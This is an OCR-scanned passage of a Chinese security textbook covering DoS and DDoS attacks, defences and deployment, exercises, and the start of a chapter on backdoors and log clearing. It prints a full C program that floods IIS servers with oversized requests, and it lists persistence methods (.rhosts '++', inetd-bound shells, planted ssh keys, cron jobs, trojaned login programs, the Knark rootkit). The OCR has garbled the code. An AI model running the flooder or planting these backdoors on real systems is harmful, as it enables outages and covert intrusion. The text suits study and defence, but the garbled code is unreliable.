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序 、 操 作 系统 等 在 处 理 异 常 条 件 时 的 逻辑 错误 实施 的 Dog 攻击 。 攻 击 者 通常 向 目标 系统 发 
送 精心 设计 的 畸形 分 组 来 试图 导致 服务 的 失效 和 系统 的 崩溃 。 

4. 基于 路 由 的 DoS 攻击 

在 基于 路 由 的 Dog 攻击 中 ， 攻 击 者 操纵 路 由 表 项 以 拒绝 向 合法 系统 或 网 络 提供 服务 ， 
诸如 路 由 信息 协议 和 边界 网 关 协 议 之 类 较 早 版 本 的 路 由 协议 没有 或 只 有 很 弱 的 认证 机 制 。 
这 就 给 攻击 者 变换 合法 路 径 提供 了 良好 的 前 提 ， 往 往 通过 假冒 源 人 P 地 址 就 能 创建 DoS 攻 
击 。 这 种 攻击 的 后 果 是 受害 者 网 络 的 分 组 或 者 经 由 攻击 者 的 网 络 路 由 ， 或 者 被 路 由 到 不 存 
在 的 黑洞 网 络 上 。 

S. 基于 DNS 的 DoS 攻击 

基于 DNS 的 攻击 与 基于 路 由 的 Dog 攻击 类 似 。 大 多 数 的 DNS 攻击 涉及 欺骗 受害 者 的 
域名 服务 器 高 速 缓存 虚假 的 地 址 信息 , 这 样 , 当 用 户 请 求 某 DNS 服务 器 执行 查找 请 求 的 时 
候 ， 攻 击 者 就 达到 了 把 它们 重 定向 到 自己 喜欢 的 站 点 上 的 效果 。 


6.8.4 对 IIS Web Server 进行 DoS 攻击 


当 IS 处 于 默认 情况 下 ， 容 易 受 到 拒绝 服务 的 攻击 。 如 果 注 册 表 中 有 一 个 叫 
MaxClientRequestBuffer 的 键 未 被 创建 ， 针 对 这 种 NT 系统 的 攻击 通常 能 奏效 。 

MaxClientRequestBuffer 这 个 键 用 于 设置 HS 允许 接受 的 输入 量 。 如 果 
MaxClientRequestBuffer 设置 为 256， 则 攻击 者 通过 输入 大 量 的 字符 请 求 ，IIS 将 被 限制 在 
256B 以 内 ， 而 系统 的 默认 设置 对 此 不 加 限制 ， 因 此 未 加 防护 的 IS 就 很 容易 受到 拒绝 服务 
攻击 。 利 用 下 面 的 程序 ， 可 以 很 容易 地 对 IIS 服务 实行 DoS 攻击 。 


#include<studio.h> 
#include<windows .h> 
#define MAX THREAD 666 
Void cng(); 
Char * server; 
Char * buffer; 
Int port; 
Int counter = 0; 
Int current threads = 0; 
Int main(int argc,char ** argv) 
{ 
WORD tequila; 
WSADATA data; 
Int p; 
DWORD tid; 
HANDLE hThread[2000]; 
printf ("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eeye.com\n\"For my 
beloved.\"\n"); 
If(argc<2) 
{ 


Printf ("Usage: ss[server] [port]\n",argv[0]); 


Exit (1); 
} 
Buffer = malloc(17500); 
Memset (buffer, 'A',strlen (buffer)); 
Server = argv[1]; 
Port = atoi (argv[2]); 
Tequila = MAKEWORD(1,1); 
Printf ("Attempting to start winsock."); 
If((WSAStartup (tequila, gdata) ) !=0) 
{ 
Printf ("failed to start winsock.\n"); 
Exit (1); 
} 
Else 
{ 
Printf ("started winsock.\n\n"); 
} 
Counter = 0; 
For(p = 0;p<MAX THREAD;++p) 
{ 
hThread[counter] = CreateThread(0,0 (LPTHREAD START_ 
COUNTINE) cng, (void*)++counter,0, &tid); 
} 
Sleep (250); 
While (current_threads) 
Sleep (250) 
Counter = 0; 
Printf("Terminated Threads.\n"); 
While (counter<MAX THREAD) 
{ 
TerminateThread (hThread[counter] ,0); 
++counter; 
} 
WSsACleanup (); 
Return 0; 
} 
Void cng() 
{ 
Int SockFD = 0,p; 
Struct sockaddr in DstSAin; 
Char GETKLLED[] = "GET / HTTP /\r\n™; 
Int die = 17 
Printf ("Entered CNGNn") 
++Current threads; 
DstsAin.sin family = AF _INET; 
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DstsAin.sin port = htons((u short)port); 
DstsAin.sin addr.s addr = inet addr (server); 
If((SockFD = socket (AF _ INET,SOCK STREAM, 0))<0) 
{ 

Printf ("Failed to create socket\n"); 

--Current threads; 

Return; 


} 
If(!connect (SockFD, (struct sockaddr *) gDstSAin,sizeof (DstSAin))) 


{ 
P=send (SockFD, GETKILLED, strlen (GETKILLED) ,0); 
Printf ("Step 1:%i\n",p); 
For(;;) 
{ 
P=Send (SockFD, buffer, strlen (buffer) ,0); 
Printf("P: %i\n",p)s 
} 
} 
Current threads; 
Printf ("Exited CNG\n"); 
Return; 
攻击 结果 将 导致 NT 系统 的 CPU 利用 率 达 到 100%。 解 决 此 类 攻击 的 方法 是 ， 在 对 话 
框 中 输入 Regedt32.exe, 在 注册 表 中 的 HKEY_LOCAL MACHINE\SYSTEM\CurrentControl 
Set\Services\w3svc\parameters 中 增加 一 个 键 值 : MaxClientRequestBuffer。 键 值 类 型 为 
REG_DWORD, 设置 数值 为 十 进 值 , 具体 数值 设置 为 用 户 IS 系统 允许 接受 的 URL 最 大 长 
度 ， 通 常数 值 设置 为 256。 


6.8.5 分布 式 拒绝 服务 攻击 


DDoS 全 名 是 Distributed Denial of Service 〔( 分 布 式 拒绝 服务 攻击 )， 很 多 DoS 攻击 源 
一 起 攻击 某 台 服务 器 就 组 成 了 DDoS 攻击 , DDoS 最 早 可 追溯 到 1996 年 最 初 , 在 中 国 2002 
年 开始 频繁 出 现 ，2003 年 已 经 初 具 规模 。DDoS 攻击 是 利用 一 批 受 控制 的 机 器 向 一 台 机 器 
发 起 攻击 ， 这 种 攻击 来 势 迅猛 ， 令 人 难以 防备 ， 且 具有 较 大 的 破坏 性 。 

近 几 年 由 于 宽带 的 普及 ， 很 多 网 站 开始 盔 利 ， 其 中 很 多 非法 网 站 利润 巨大 ， 造 成 同行 
之 间 互 相 攻 击 ， 还 有 一 部 分 人 利用 网 络 攻击 来 敲诈 钱财 。 同 时 Windows 平台 的 漏洞 被 大 量 
地 公布 ， 流 谍 软 件 、 病 毒 、 木 马 大量 充 斥 着 网 络 ， 有 些 懂 技术 的 人 可 以 很 容易 非法 入 侵 控 
制 大 量 的 个 人 计算 机 来 发 起 DDoS 攻击 从 中 牟利。 攻击 已 经 成 为 互联 网 上 的 一 种 最 直接 的 
竞争 方式 ， 而 且 收 入 非常 高 ， 利 益 的 驱使 下 ， 攻 击 已 经 演变 成 非常 完善 的 产业 链 。 通 过 在 
大 流量 网 站 的 网 页 里 注入 病毒 木马 , 木马 可 以 通过 Windows 平台 的 漏洞 感染 浏览 网 站 的 计 
算 机 ， 一 旦 中 了 木马 ， 这 台 计 算 机 就 会 被 后 台 操作 的 人 控制 ， 这 台 计 算 机 也 就 成 了 所 谓 的 
肉鸡 ， 每 天 都 有 人 专门 收集 肉鸡 然后 以 几 毛 到 几 块 一 个 的 价格 出 售 ， 因 为 利益 需要 攻击 的 
人 就 会 购买 ， 然 后 遥控 这 些 肉 鸡 攻 击 服务 器 。 


分 布 式 拒绝 服务 攻击 采用 了 一 种 比较 特别 的 体系 结构 ， 从 许多 分 布 的 主机 同时 攻击 一 
个 目标 ， 从 而 导致 目标 瘫痪 。 目 前 所 使 用 的 入 侵 检测 和 过 滤 方 法 对 这 种 类 型 的 入 侵 都 不 起 
作用 。 为 了 找 出 这 种 攻击 的 漏洞 ， 有 效 地 监测 和 捕获 这 种 入 侵 ， 必 须 对 其 所 采用 工具 进行 


6.8.6 DDoS 体系 结构 
一 个 比较 完善 的 DDoS 攻击 体系 分 成 4 大 部 分 ， 如 图 6-32 所 示 。 
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图 6-32 DDoS 攻击 体系 


(1) 攻击 控制 台 : 黑客 所 用 的 主机 ， 也 称 为 攻击 者 。 它 操纵 整个 攻击 过 程 ， 向 主 控 端 
发 送 攻击 命令 。 

(2) 攻击 服务 器 : 是 攻击 者 非法 侵入 并 控制 的 一 些 主机 ， 这 些 主机 分 别 控制 大 量 的 代 
理 攻击 主机 。 其 上 面 安装 特定 的 程序 ， 可 以 接受 攻击 者 发 来 的 特殊 指令 ， 并 且 可 以 把 这 些 
指令 发 送 到 攻击 器 上 。 

(3) 攻击 器 : 也 是 攻击 者 侵入 并 控制 的 一 批 主机 ， 其 上 面 运 行 攻击 程序 ， 接 受 和 运行 
主 控 端 发 来 的 命令 。 

(4) 目标 主机 : 被 攻击 的 受害 者 。 

先 来 看 一 下 最 重要 的 第 二 部 分 (攻击 服务 器 ) 和 第 三 部 分 (攻击 器 )， 它 们 分 别 用 做 
控制 和 实际 发 起 攻击 。 请 注意 攻击 服务 器 与 攻击 器 的 区 别 ， 对 第 四 部 分 的 目标 主机 来 说 ， 
DDoS 的 实际 攻击 包 是 从 第 三 部 分 攻击 器 侈 偏 机 上 发 出 的 ， 第 二 部 分 的 攻击 服务 器 只 发 布 
命令 而 不 参与 实际 的 攻击 。 对 第 二 和 第 三 部 分 计算 机 ， 第 一 部 分 黑客 (攻击 控制 台 〉 有 控 
制 权 或 者 是 部 分 的 控制 权 ， 并 把 相应 的 DDoS 程序 上 传 到 这 些 平台 上 ， 这 些 程 序 与 正常 的 
程序 一 样 运行 并 等 待 来 自 黑客 的 指令 ， 通 常 它 还 会 利用 各 种 手段 隐藏 自己 不 被 别人 发 现 。 
在 平时 ， 这 些 攻 击 服务 器 并 没有 什么 异常 ， 只 是 一 旦 黑客 连接 到 它们 进行 控制 ， 并 发 出 指 
令 的 时 候 ， 攻 击 服务 器 就 成 为 害 人 者 去 发 起 攻击 了 。 
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为 什么 黑客 不 直接 去 控制 攻击 器 ， 而 要 从 攻击 服务 器 上 转 一 下 呢 ? 作 为 攻击 者 ， 肯 定 
不 愿意 被 提 到 ， 而 攻击 者 使 用 的 倪 儒 机 越 多 ， 他 实际 上 提供 给 受害 者 的 分 析 依据 就 越 多 。 
在 占领 一 台 机 器 后 ， 高 水 平 的 攻击 者 会 首先 做 两 件 事 : 第 一 ， 考 虑 如 何 留 好 后 门 ， 第 二 ， 
如 何 清理 日 志 。 但 是 在 第 三 部 分 攻击 器 上 清理 日 志 实在 是 一 项 庞大 的 工程 ， 即 使 在 有 很 好 
的 日 志清 理工 具 的 帮助 下 ， 黑 客 也 是 对 这 个 任务 很 头痛 的 。 这 就 导致 了 有 些 攻击 器 清除 日 
志 不 是 很 干净 ， 通 过 它 上 面 的 线索 找到 了 控制 它 的 上 一 级 计算 机 ， 这 上 一 级 的 计算 机 如 果 
是 黑客 自己 的 机 器 ， 那 么 他 就 会 被 揪 出 来 了 。 但 如 果 这 是 控制 攻击 服务 器 的 话 ， 黑 客 自身 
还 是 安全 的 。 控 制服 务 器 的 数目 相对 很 少 ， 一 般 一 人 台 就 可 以 控制 儿 十 台 攻 击 机 ， 清 理 一 台 
计算 机 的 日 志 对 黑客 来 讲 就 轻松 多 了 ， 这 样 从 控制 机 再 找到 黑客 的 可 能 性 也 大 大 降低 。 


6.8.7 DDoS 攻击 过 程 


DDos 发 生 的 过 程 可 以 描述 如 下 。 

1. 搜集 了 解 目标 的 情况 

。 被 攻击 目标 主机 数据 、 地 址 情况 。 

。 目标 主机 的 配置 、 性 能 。 

。 目标 的 带宽 。 

从 目标 情况 中 找到 可 能 成 为 倪 儒 机 的 机 器 。 

2. 占领 倪 偶 机 

。 链 路 状态 好 的 主机 。 

。 性 能 好 的 主机 。 

。 安全 管理 水 平 差 的 主机 。 

首先 ， 一 般 采 用 扫描 手段 ， 随 机 地 或 者 是 有 针对 性 地 利用 扫描 器 去 发 现 互 联网 上 那些 
有 漏洞 的 机 器 ， 像 程序 的 溢出 漏洞 、 数 据 库 漏洞 等 ， 随 后 就 是 尝试 入 侵 了 ， 一 旦 入 侵 后 ， 
把 DDoS 攻击 用 的 程序 上 载 过 去 ， 一 般 是 利用 FTP。 在 攻击 器 上 ， 会 有 一 个 DDoS 的 发 包 
程序 ， 攻 击 者 就 是 利用 它 来 向 目标 主机 发 送 恶意 攻击 包 。 

3. 实际 攻击 

经 过 前 两 个 阶段 的 精心 准备 ， 就 可 以 开始 瞄准 目标 准备 发 射 了 。 攻 击 者 登录 到 作为 攻 
击 服务 器 的 倪 偶 机 , 向 所 有 的 攻击 器 发 出 DDoS 攻击 命令 , 这 时 候 埋伏 在 攻击 器 中 的 DDoS 
攻击 程序 就 会 响应 攻击 服务 器 的 命令 ， 一 起 向 目标 主机 或 设备 高 速度 发 送 大 量 的 数据 包 ， 
导致 服务 停止 、 死 机 或 连接 线路 拥塞 中 断 。 


6.8.8 DDoS 防御 的 方法 


1. 定期 扫描 

要 定期 扫描 现 有 的 网 络 主 节点 ， 清 查 可 能 存在 的 安全 漏洞 ， 对 新 出 现 的 漏洞 及 时 进行 
清理 。 骨 干 节点 的 计算 机 因为 具有 较 高 的 带宽 ， 是 黑客 利用 的 最 佳 位 置 ， 因 此 对 这 些 主机 
本 身 加 强 主机 安全 是 非常 重要 的 。 而 且 连 接 到 网 络 主 节点 的 都 是 服务 器 级 别 的 计算 机 ， 所 
以 定期 扫描 漏洞 就 变 得 更 加 重要 了 。 

2. 采用 高 性 能 的 网 络 设备 

首先 要 保证 网 络 设备 不 能 成 为 瓶 天， 因此 选择 路 由 器 、 交 换 机 、 硬 件 防 火 墙 等 设备 的 


时 候 要 尽量 选用 知名 度 高 、 口 碑 好 的 产品 。 再 就 是 假如 选择 和 网 络 提供 商 有 特殊 关系 或 协 
议 的 话 就 更 好 了 ， 当 大 量 攻击 发 生 的 时 候 请 它们 在 网 络 节点 处 做 一 下 流量 限制 来 对 抗 某 些 
种 类 的 DDoS 攻击 是 非常 有 效 的 。 

3. 尽量 避免 NAT 的 使 用 

无 论 是 路 由 器 还 是 硬件 防火 墙 设备 要 尽量 避免 采用 网 络 地 址 转换 NAT 的 使 用 , 因为 采 
用 此 技术 会 较 大 降低 网 络 通信 和 能力， 其 实 原因 很 简单 ， 因 为 NAT 需要 对 地 址 来 回转 换 ， 转 
换 过 程 中 需要 对 网 络 包 的 校 验 和 进行 计算 , 因此 浪费 了 很 多 CPU 的 时 间 , 但 有 些 时 候 必须 
使 用 NAT， 那 就 没有 好 办 法 了 。 

4. 充足 的 网 络 带宽 保证 

网 络 带宽 直接 决定 了 对 抗 受 攻击 的 能 力 ， 假 车 仅仅 有 10Mb 带宽 的 话 ， 无 论 采 取 什么 
措施 都 很 难 对 抗 现 在 的 SYNFlood 攻击 ， 当 前 至 少 要 选择 100Mb 的 共享 带宽 ， 最 好 的 当然 
是 挂 在 1000Mb 的 主干 网 上 了 。 但 需要 注意 的 是 ， 主 机 上 的 网 卡 是 1000Mb 的 并 不 意味 着 
它 的 网 络 带宽 就 是 千 兆 的 , 若 把 它 接 在 100Mb 的 交换 机 上 , 它 的 实际 带宽 不 会 超过 100Mb， 
再 就 是 接 在 100Mb 的 带宽 上 也 不 等 于 就 有 了 百 兆 的 带宽 , 因为 网 络 服务 商 很 可 能 会 在 交换 
机 上 限制 实际 带宽 为 10Mb， 这 点 一 定 要 搞 清 楚 。 

S. 在 骨干 节点 配置 防火 墙 

防火 墙 本 身 能 抵御 DDoS 攻击 和 其 他 一 些 攻击 。 在 发 现 受到 攻击 的 时 候 ， 可 以 将 攻击 
导向 一 些 牺牲 主机 ， 这 样 可 以 保护 真正 的 主机 不 被 攻击 。 当 然 导 向 的 这 些 牺牲 主机 可 以 选 
择 不 重要 的 ， 或 者 是 Linux 以 及 UNIX 等 漏洞 少 和 天 生 防 范 攻击 优秀 的 系统 。 

6. 过滤 不 必要 的 服务 和 端口 

过 滤 不 必要 的 服务 和 端口 ， 即 在 路 由 器 上 过 滤 假 也。 只 开放 服务 端口 成 为 目前 很 多 服 
务 器 的 流行 做 法 ， 例 如 WWW 服务 器 只 开放 80 端口 而 将 其 他 所 有 端口 关闭 或 在 防火 墙 上 
做 阻止 策略 。 

7. 检查 访问 者 的 来 源 

使 用 Unicast Reverse Path Forwarding 等 通过 反 向 路 由 器 查询 的 方法 检查 访问 者 的 下 地 
址 是 否 是 真 ， 如 果 是 假 的 ， 它 将 予以 屏蔽 。 许 多 黑客 攻击 常 采用 假 卫 地 址 方式 迷惑 用 户 ， 
很 难 查 出 它 来 自 何 处 。 因 此, 利用 Unicast Reverse Path Forwarding 可 减少 假 卫 地址 的 出 现 ， 
有 助 于 提高 网 络 安全 性 。 

8. 限制 SYN/ICMP 流量 

用 户 应 在 路 由 器 上 配置 SYN/ICMP 的 最 大 流量 来 限制 SYN/ICMP 包 所 能 占有 的 最 高 频 
宽 ， 这样 ， 当 出 现 大 量 的 超过 所 限定 的 SYN/ICMP 流量 时 ， 说 明 不 是 正常 的 网 络 访问 ， 而 
是 有 黑客 入 侵 。 早期 通过 限制 SYN/ICMP 流量 是 最 好 的 防范 DoS 的 方法 ,虽然 目前 该 方法 
对 于 DDoS 效果 不 太 明 显 了 ， 不 过 仍然 能 够 起 到 一 定 的 作用 。 


6.8.9 DDoS 防护 部 署 


1， 串 行 部 署 防御 DDoS 攻击 
品行 部 署 防御 模式 主要 应 用 在 企业 网 络 中 ， 在 网 络 的 出 口 或 要 保护 的 目标 地 址 前 进行 
部 署 ， 提 供 串 行 的 保护 形式 ， 如 图 6-33 所 示 。 
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此 种 部 署 模式 不 需要 DDoS 攻击 检测 器 ,直接 将 防护 设备 部 署 在 需要 保护 的 设备 前 面 ， 
利用 设备 的 识别 能 力 ， 直 接 过 滤 攻 击 流量 。 

此 种 部 署 模 式 实施 比较 简单 ， 但 也 有 以 下 几 个 较为 明显 的 弱点 : 

。 可 能 会 成 为 性 能 瓶 有 天， 任何 时 候 流 量 都 经 过 防范 设备 ; 

。 在 需要 保护 的 目标 设备 比较 多 的 情况 下 ， 投 资 较 高 ; 

。 对 来 自 上 游 的 基于 带宽 的 DDoS 攻击 无 法 提供 有 效 保护 。 


图 6-33 ” 串 行 部 署 防御 模式 


2. 旁 路 部 署 防御 DDoS 攻击 

完整 的 DDoS 保护 围绕 4 个 关键 主题 建立 : 

(1) 要 缓解 攻击 ， 而 不 只 是 检测 ; 

(2) 从 恶意 业务 中 精确 辨认 出 正常 的 业务 ， 维 持 业 务 继续 进行 ， 而 不 只 是 检测 攻击 的 
存在 ; 
(3) 内 部 性 能 和 体系 结构 能 对 上 游 进 行 配置 ， 保 护 所 有 易 受 损 点 

(4) 维持 可 靠 性 和 成 本 效益 可 升级 性 。 

旁 路 式 部 署 防御 模式 可 以 完全 围绕 这 几 个 关键 主题 进行 ， 没 有 串 行 模式 的 几 大 弱点 ， 
可 以 应 用 在 各 种 网 络 中 ， 对 网 络 设备 、 服 务 器 等 提供 保护 ， 如 图 6-34 所 示 。 

此 种 部 署 模 式 是 在 原 有 网 络 的 基础 上 实施 的 ， 对 原 有 网 络 没有 任何 改变 。 此 方式 需要 
DDoS 攻击 检测 器 或 流量 异常 检测 手段 ， 当 检测 器 发 现 DDoS 攻击 后 ， 直 接 通知 DDoS 防 
范 器 将 流量 引导 到 DDoS 防范 器 进行 过 滤 ， 然 后 将 过 滤 完 后 正常 的 流量 继续 传送 到 目标 
地 址 。 

这 种 模式 基于 检测 、 转 移 、 验 证 和 转发 的 基础 上 实施 一 个 完整 DDoS 保护 解决 方案 来 
提供 完全 保护 ， 通 过 下 列 措施 维持 业务 不 间断 进行 。 

(1) 实时 检测 DDoS 停止 服务 攻击 ; 

(2) 转移 指向 目标 设备 的 数据 业务 到 特定 的 DDoS 攻击 防护 设备 进行 处 理 ; 


(3) 从 正常 的 数据 包 中 分 析 和 过 滤 出 恶意 的 数据 包 ， 阻 止 恶意 业务 影响 性 能 ， 同 时 允 
许 合法 业务 的 处 理 ; 
(4) 转发 正常 业务 来 维持 商务 持续 进行 。 


图 6-34 旁 路 部 署 防御 模式 


此 种 部 署 模式 具有 如 下 的 特点 : 


DDoS 攻击 检测 和 防范 过 程 可 以 完全 自动 实现 ; 


DDoS 攻击 
防范 设备 
DDoS 攻击 
检测 设备 


DDoS 防范 设备 不 会 成 为 性 能 瓶颈 ， 只 有 当 攻 击发 生 的 时 候 ， 流 量 才 会 经 过 DDoS 


防范 设备 ; 
适合 运营 商 和 大 型 企业 ; 
不 仅 可 以 防范 面向 CPU 的 DDoS 攻击 ， 也 可 以 防范 面向 带宽 的 攻击 ; 


DDoS 防范 设备 是 旁 路 的 ， 同 时 又 是 共享 设备 ， 可 以 对 众多 的 保护 目标 提供 保护 又 


不 会 成 为 性 能 瓶颈 ; 
在 需要 保护 的 目标 设备 比较 多 的 情况 下 ， 平 均 投资 明显 下 降 ; 
对 来 自 上 游 的 基于 带宽 的 DDoS 攻击 可 以 提供 有 效 保护 ; 


在 运营 商 网 络 环境 中 ， 可 以 很 容易 将 其 转变 成 完全 服务 产品 ， 销 售 给 企业 用 户 ; 


适用 于 复杂 的 网 络 环境 ， 如 他 、MPLS、MPLS VPN、GRE Tunnel 等 。 


此 种 部 署 模式 对 DDoS 防御 具有 以 下 保护 性 能 : 
即使 在 攻击 者 的 身份 不 断 变化 的 情况 下 ， 通过 完整 的 检测 和 阻 断 机 制 也 可 以 立即 响 


应 DDoS 攻击 ; 

与 静态 路 由 过 滤器 或 IDS 签名 相 比 ， 能 提供 更 完整 的 验证 性 能 ; 
提供 基于 行为 的 反常 事件 识别 来 检测 含有 恶意 意图 的 有 效 包 ; 
识别 和 阻 断 个 别 的 欺骗 包 ， 保 护 合法 商务 交易 ; 
提供 能 处 理 大 量 DDoS 攻击 但 不 影响 被 保护 资源 的 机 制 ; 
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。 攻击 期 间 能 按 需 求 布置 保护 ， 不 会 引进 故障 点 或 增加 串联 策略 的 瓶颈 点 ; 
。 内 置 智能 只 处 理 被 感染 的 业务 流 ， 确 保 可 靠 性 最 大 化 和 花 销 比 例 最 小 化 ; 
避免 依赖 网 络 设备 或 配置 转换 ; 

。 所 有 通信 使 用 标准 协议 ， 确 保 互 操 作 性 和 可 靠 性 最 大 化 。 


思考 与 练习 


. 简 述 社会 工程 学 攻击 的 原理 。 

.登录 系统 后 如 何 获得 管理 员 密码 ? 

. 简 述 暴力 攻击 的 原理 。 

.如 何 防御 暴力 攻击 ? 

. 简 述 Unicode 漏洞 的 基本 原理 。 

. 简 述 缓冲 区 溢出 攻击 的 原理 。 

. 简 述 拒绝 服务 攻击 的 种 类 和 原理 。 

. 利用 三 种 不 同 的 方法 ， 入 侵 目标 计算 机 。 
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第 7 章 网 络 后 门 与 清除 日 志 


本 章 学 习 目 标 : 

。 了解 留 后 门 的 原则 ; 
掌握 账号 后 门 和 服务 后 门 ; 
了 解 主机 日 志 类 型 ; 

掌握 清除 主机 日 志方 法 ; 
掌握 清除 IIS 日 志方 法 。 


7.1 网 络 后 


简单 地 说 ， 后 门 就 是 攻击 者 再 次 进入 网 络 或 者 是 系统 而 不 被 发 现 的 隐藏 通道 。 

有 人 说 ， 留 后 门 是 一 种 艺术 。 留 后 门 并 不 是 一 项 简单 的 工作 ， 不 但 要 留 下 下 次 进入 的 
通道 ， 而 且 还 要 对 自己 所 做 的 一 切 加 以 隐藏 ， 如 果 建 立 起 的 后 门 马上 就 被 管理 员 发 现 就 没 
有 任何 用 处 了 。 所 以 ， 只 要 是 不 容易 被 发 现 的 后 门 就 是 好 后 门 。 留 后 门 的 原理 和 选 间谍 是 
- 样 的， 让 管理 员 看 了 感觉 没有 任何 特别 的 地 方 。 

留 一 个 隐蔽 的 后 门 需要 动 很 多 脑筋 ， 是 一 种 黑客 和 管理 员 智 慧 的 较量 。 并 且 留 后 门 的 
es 只 要 能 实现 目的 就 可 以 利用 我 们 的 智慧 用 任何 方法 留 下 后 门 。 

早期 的 计算 机 入 侵 者 开始 ， 他 们 就 努力 发 展 能 使 自己 重 返 被 入 侵 系统 的 技术 或 后 

eet rites tai 即使 管理 员 改 变 密码 仍然 能 再 次 入 侵 ，] 
且 将 再 次 入 侵 时 被 发 现 的 可 能 性 减 至 最 低 。 大 多 数 后 门 是 设法 躲 过 日 志 ， 这 样 即使 入 侵 者 
正在 使 用 系统 也 无 法 显示 他 已 在 线 。 有 时 如 果 入 侵 者 认为 管理 员 可 能 会 检测 到 已 经 安装 的 
后 门 ， 他 们 会 以 系统 的 脆弱 性 作为 唯一 后 门 ， 反 复 攻 破 机 器 。 以 后 讨论 的 后 门 都 是 假设 入 
侵 的 黑客 已 经 成 功 地 取得 了 系统 权限 后 的 行动 。 

留 后 门 通常 有 两 种 目的 : 

(1) 保持 对 目标 系统 的 长 期 控制 ; 

(2) 监听 目标 系统 的 行动 或 记录 目标 系统 的 敏感 信息 ， 随 时 报告 入 侵 者 。 


7.1.1 后门 的 分 类 


1. 后 门 的 分 类 概述 
留 后 门 的 方法 可 以 说 数不胜数 ， 不 过 我 们 可 以 利用 不 同 后 门 的 不 同 特点 对 后 门 进行 
分 类 。 
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从 后 门 的 整体 特点 来 分 可 分 为 两 大 类 : 主动 后 门 和 被 动 后 门 。 主 动 后 门 就 是 后 门 程序 
会 主动 地 监听 某 个 端口 或 进程 ， 随 时 等 竺 连接， 后 门 的 特征 非常 明显 。 被 动 后 门 不 会 做 任 
何 的 工作 ， 只 有 连接 者 去 连接 的 时 候 才 能 表现 出 后 门 的 特征 。 

从 开放 端口 情况 上 来 分 可 分 为 : 开放 端口 的 后 门 、 不 开放 端口 的 后 门 和 利用 系统 已 经 
开放 的 端口 的 后 门 。 

从 工作 模式 上 来 分 可 分 为 : 命令 模式 的 后 门 、 图 形 界面 的 后 门 和 B/S 结构 基于 浏览 器 
的 后 门 。 

从 连接 模式 上 分 为 : 正 向 连接 后 门 和 反 向 连接 后 门 。 

2. 常见 网 络 后 门 

后 门 程序 的 目的 就 是 即使 系统 管理 员 已 经 弥补 了 系统 漏洞 ， 入 侵 者 也 可 以 取得 对 系统 
的 访问 权限 。 常 见 的 后 门 可 以 通过 修改 配置 文件 、 建 立 系统 木马 程序 、 修 改 系统 内 核 等 方 
法 来 实现 入 侵 者 今后 以 非特 权 用 户 使 用 root 权限 。 

1) 修改 配置 文件 

修改 配置 文件 是 最 简单 的 一 种 添加 后 门 的 方法 ， 因 此 被 广泛 使 用 。 通 常 入 侵 者 比较 嘉 
欢 修 改 的 配置 文件 有 以 下 几 种 。 

@ .rhosts 文件 。 用 户 根 目录 下 的 .rhosts 文件 ， 通 常 被 协议 用 于 判断 主机 和 账号 间 的 信 
赖 关系 。 如 果 一 个 账号 根 目 录 下 的 .rhosts 文件 中 含有 “++” 则 任何 人 在 任何 地 方 都 可 以 
不 用 密码 而 用 这 个 账号 来 登录 。 尤 其 是 在 超级 用 户 根 目录 下 ， 更 有 可 能 出 现 。 

@ hosts.equiv 文件 。 是 系统 信任 主机 的 列表 。 

@ inetd.conf 文件 。 通 常 是 入 侵 者 将 一 个 Shell 绑 定 到 一 个 特定 的 TCP 端口 ， 任 何人 
Telnet 这 个 端口 都 可 以 获得 交互 的 Shell。 通 常 是 在 该 文件 中 增加 或 者 修改 一 行 来 达到 。 

@ ssh 认证 密 钥 。 入 侵 者 把 自己 的 公共 密 钥 放 到 目标 机 器 的 ssh 配置 文件 authorized_ 
keys 里 ， 从 而 可 以 用 该 账号 来 访问 机 器 而 不 需要 密码 。 

@ cron 后 门 。 入 侵 者 在 cron 增加 或 修改 一 些 任 务 ， 在 某 个 特定 的 时 间 程 序 运 行 ， 从 
而 取得 对 系统 的 访问 权限 。 

@ 启动 任务 。 通 常 在 /etc/re.d/ 或 者 是 /etc/rc?.d/ 下 ， 入 侵 者 可 以 增加 一 些 启动 的 服务 程 
序 ， 这 样 自己 便 可 以 利用 这 些 服务 程序 取得 对 系统 的 控制 。 在 修改 这 些 配 置 文件 时 ， 经 常 
还 伴随 着 系统 其 他 文件 的 修改 和 增加 。 

2) 建立 系统 木马 程序 

任何 服务 程序 都 可 以 成 为 木马 来 为 远程 用 户 提供 访问 权限 。 例 如 ， 通 过 修改 in.telnetd 
或 者 是 login 程序 ， 当 入 侵 者 输入 某 一 指定 的 密码 时 ， 即 取得 超级 用 户 权限 。 入 侵 者 通常 
习惯 于 更 改 的 木马 程序 有 以 下 几 种 。 

Q in.telnetd、login 等 登录 程序 。 通 过 修改 这 些 登 录 程序 ， 入 侵 者 通过 自己 定义 的 一 
个 口令 就 可 以 取得 系统 的 控制 权 。 

@ 入 侵 者 会 修改 一 些 系统 的 动态 连接 库 来 作为 后 门 ， 这 样 做 对 入 侵 者 的 好 处 是 一 方 
面 比较 隐秘 ， 另 外 一 方面 ， 被 管理 员 检 查 出 来 的 可 能 性 要 小 一 些 。 

@ 增加 一 些 新 的 服务 程序 ， 通过 inetd 启动 或 者 是 通过 rc 脚本 启动 。 这 种 后 门 对 入 侵 


者 使 用 比较 方便 ， 但 也 比较 容易 被 查 出 。 
3) 修改 内 核 
如 Knark， 它 是 新 一 代 的 rootkit 工具 ， 它 基于 LKM 技术 ， 可 以 有 效 地 隐藏 后 门 的 信 
使 用 Knark， 可 以 完成 如 下 功能 。 
@ 隐藏 或 显示 文件 或 目录 。 
@ 隐藏 TCP 或 UDP 连接 。 
@) 程序 执行 重 定向 。 
@ 非 授 权 的 用 户 权 限 增 加 (rootme)。 
@ 改变 一 个 运行 进程 的 UID/GID 工具 。 
@ 非 授 权 的 、 特 权 程序 远程 执行 守护 进程 。 
@ Kill-31 来 隐藏 运行 的 进程 。 
联合 使 用 程序 执行 重新 定向 和 文件 隐藏 ， 入 侵 者 能 执行 各 种 后 门 程序 。 由 于 执行 重 定 
向 是 在 内 核 级 别 进行 的 ， 因 此 文件 检测 工具 不 会 发 现 程序 文件 被 修改 ， 原 始 的 执行 程序 
没有 被 修改 ， 因 此 配置 检测 工具 在 路 径 环境 中 也 不 会 发 现任 何 异 常 。 

如 果 Knark 结合 另外 一 个 用 来 隐藏 系统 当前 加 载 的 模块 的 LKM 工具 modhide, 就 可 能 
实现 甚至 通过 Ismod 命令 也 不 能 发 现 Knark 的 存在 。Knark 的 作者 还 设计 了 一 个 Knark 的 
消除 程序 knarkfinder， 可 以 用 来 发 现 Knark 所 隐藏 的 程序 。 


7.1.2 常用 后 门 工具 的 使 用 


1. 账号 后 门 

